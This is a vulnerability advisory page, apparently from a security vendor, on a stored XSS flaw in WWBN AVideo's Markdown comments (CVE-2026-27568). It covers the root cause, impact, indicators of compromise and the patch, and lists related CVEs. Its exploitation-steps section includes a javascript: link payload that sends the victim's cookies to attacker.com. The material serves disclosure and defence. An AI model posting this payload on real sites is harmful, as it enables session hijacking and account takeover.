CVE-2026-27568: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-27568 is a Stored Cross-Site Scripting (XSS) vulnerability in WWBN AVideo, an open-source video platform, caused by insufficient sanitization of Markdown links in video comments. The vulnerability affects AVideo versions prior to 21.0 and was discovered by Arkadiusz Marta, with the advisory published on February 20, 2026. It carries a CVSS v3.1 base score of 6.1 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (GitHub Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation). AVideo uses Parsedown v1.7.4 to render Markdown in video comments without enabling Safe Mode or escaping markup, allowing javascript: URI schemes to pass through unsanitized and be rendered as clickable hyperlinks in the browser. An authenticated attacker with low privileges can craft a malicious Markdown comment containing a javascript: URI (e.g., [Click me](javascript:malicious_code())), which is then persistently stored and executed in the context of any user who clicks the link. The fix, applied in commit ade348e, enables $parsedown->setSafeMode(true) and $parsedown->setMarkupEscaped(true) in the markDownToHTML() function within objects/functionsSecurity.php (GitHub Commit, GitHub Advisory).

Impact

Because the malicious payload is stored server-side, it persistently affects every user who views and clicks the injected comment link, not just the initial victim. Successful exploitation enables session hijacking (theft of session cookies or tokens), privilege escalation up to and including full administrator account takeover, and data exfiltration from the victim's browser context. Availability is not directly impacted, but the confidentiality and integrity of user accounts and platform data are at significant risk (GitHub Advisory).

Exploitability

No public proof-of-concept exploit code or evidence of in-the-wild exploitation has been reported as of the time of disclosure (GitHub Advisory). The EPSS score is approximately 0.044% (2nd percentile), indicating a low near-term probability of exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires an authenticated attacker account (any low-privilege user) and victim interaction (clicking the malicious link), which somewhat limits the attack surface.

Exploitation steps

  1. Obtain a low-privilege account: Register or log in to the target AVideo instance with any authenticated user account.
  2. Identify a target video: Navigate to a video page that allows user comments and supports Markdown rendering.
  3. Craft a malicious Markdown comment: Compose a comment containing a javascript: URI as a Markdown link, for example: [Click here for more info](javascript:document.location='https://attacker.com/steal?c='+document.cookie). This payload will steal the victim's session cookie when clicked.
  4. Post the comment: Submit the malicious comment. Because Parsedown Safe Mode is disabled in vulnerable versions, the javascript: URI is rendered as a clickable hyperlink in the page HTML.
  5. Wait for victim interaction: When another user (including an administrator) views the video page and clicks the injected link, the JavaScript executes in their browser context.
  6. Harvest session data or escalate privileges: The attacker receives the victim's session cookie or token at their controlled server, enabling session hijacking. If the victim is an administrator, the attacker gains full admin access to the AVideo platform (GitHub Advisory, GitHub Commit).

Indicators of compromise

  • Network: Outbound HTTP requests from victim browsers to unexpected external domains immediately after interacting with AVideo comment sections; unusual GET requests containing URL-encoded cookie or session data in query parameters to attacker-controlled hosts.
  • Logs: AVideo web server access logs showing POST requests to comment submission endpoints containing javascript: URI strings in the comment body field; repeated access to video pages by accounts that subsequently exhibit anomalous behavior.
  • Application: Presence of comments on video pages containing Markdown link syntax with javascript: URIs (e.g., [text](javascript:...)) in the database or rendered HTML source.
  • Session/Account: Unexpected administrative actions performed from IP addresses or user agents inconsistent with the legitimate admin's normal activity, potentially indicating session hijacking and account takeover.

Mitigation and workarounds

Upgrade WWBN AVideo to version 21.0 or later, which enables Parsedown Safe Mode (setSafeMode(true)) and markup escaping (setMarkupEscaped(true)) in the markDownToHTML() function, preventing javascript: URIs from being rendered (AVideo Release 21.0, GitHub Commit). If immediate patching is not possible, manually validate and block unsafe URI schemes (e.g., javascript:, vbscript:) before rendering Markdown content, and enable Parsedown Safe Mode in the application code. Additionally, deploying a strict Content Security Policy (CSP) header that disallows inline script execution can reduce the impact of any successful XSS injection (GitHub Advisory).

Community reactions

The vulnerability was reported by security researcher Arkadiusz Marta and acknowledged by the AVideo maintainer (DanielnetoDotCom), who published the advisory and released the fix on February 20, 2026 (GitHub Advisory). A technical write-up was published on dev.to and infinitsec.net shortly after disclosure, providing additional context on the stored XSS attack vector (dev.to, infinitsec.net). General community reaction has been moderate, consistent with the medium severity rating and absence of active exploitation.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management